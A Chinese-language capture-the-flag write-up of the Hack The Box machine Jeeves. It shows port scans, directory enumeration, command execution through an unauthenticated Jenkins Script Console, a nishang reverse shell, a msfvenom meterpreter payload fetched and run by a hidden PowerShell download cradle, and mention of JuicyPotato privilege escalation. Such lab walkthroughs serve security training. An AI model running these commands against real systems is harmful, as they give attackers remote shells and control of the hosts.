抱歉,您的浏览器无法访问本站
本页面需要浏览器支持(启用)JavaScript
了解详情 >

HTB-Jeeves

HTB

发布于:2023年8月20日

Information

Port Scan

使用nmap来做全端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(kali㉿kali)-[~/Documents/htb]
└─$ nmap -p- --min-rate 10000 10.10.10.63
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-19 07:41 EDT
Nmap scan report for 10.10.10.63    
Host is up (0.27s latency).                                                                             
Not shown: 65531 filtered tcp ports (no-response)   
PORT      STATE SERVICE                                                                                 
80/tcp    open  http                                
135/tcp   open  msrpc                                                                                   
445/tcp   open  microsoft-ds                                                                            
50000/tcp open  ibm-db2                                                                                 
                                                    
Nmap done: 1 IP address (1 host up) scanned in 54.80 seconds

针对开放端口做详细的扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
┌──(kali㉿kali)-[~/Documents/htb]
└─$ nmap -sC -sV -p 80,135,445,50000 10.10.10.63     
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-19 07:56 EDT
Nmap scan report for 10.10.10.63
Host is up (0.32s latency).

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
|_http-title: Ask Jeeves
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 4h59m58s, deviation: 0s, median: 4h59m58s
| smb2-time: 
|   date: 2023-08-19T16:56:42
|_  start_date: 2023-08-19T16:40:30
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.06 seconds

已知运行服务为Microsoft IIS httpd 10.0,那么系统可能为windows10 windows Server 2016及以上版本。

WEB-80

输入内容并提交表单,得到信息如下:

通过查看源码可以发现当前响应为图片。

WEB - 50000

目录遍历

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(kali㉿kali)-[~/Documents/htb]                                                                                                      
└─$ gobuster dir -u http://10.10.10.63:50000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30                     
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.63:50000
[+] Method:                  GET
[+] Threads:                 30
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/08/20 00:54:36 Starting gobuster in directory enumeration mode 
===============================================================
/askjeeves            (Status: 302) [Size: 0] [--> http://10.10.10.63:50000/askjeeves/]

WEB

根据对50000端口的目录遍历得到的结果,访问/askjeeves目录

jenkins RCE

访问http://10.10.10.63:50000/askjeeves/

此处有jenkins未授权访问漏洞

选择”manage Jenkins”- - > “Script Console”

输入poc进行测试

1
print "whoami".execute().text

成功执行命令,那么下一步便是获取shell

Getshell

使用nishang获取shell,将nishang复制到当前目录并修改文件,在文件的最后添加如下内容:

1
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.12 -Port 1234

修改好文件之后,利用python开始web服务同时使用nc监听1234端口,即可得到shell。

Privilege

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
PS C:\Users\Administrator\.jenkins> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

尝试使用JuicyPotato 进行提权

To msf shell

# 这一步可以不做

将ps1 shell转换成msf shell,先利用msfvenom生成shellcode

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.12 LPORT=1235  -f psh-reflection >1.ps1

开启http服务提供下载功能

1
python -m http.server 808

msfconsole开启监听

1
2
3
4
5
6
msfconsole
msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LhOST 10.10.14.12
msf6 exploit(multi/handler) > set lport 1235
msf6 exploit(multi/handler) > run

在目标机执行msfvenom生成的shellcode

1
2
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebCli
ent).DownloadString('http://10.10.14.12:808/1.ps1');1.ps1"

JuicyPotato

使用juicyPotato提权,不过相较Bounty靶机的不同,jeeves获取的权限是不一致的,需要修改-t参数,因为只有SeImpersonatePrivilege 权限,需要将-t参数设置为-t t,具体参考juicy potato

更新于:2023年8月20日

HTB

windows

juicy potato

nishang

jenkins

RCE

评论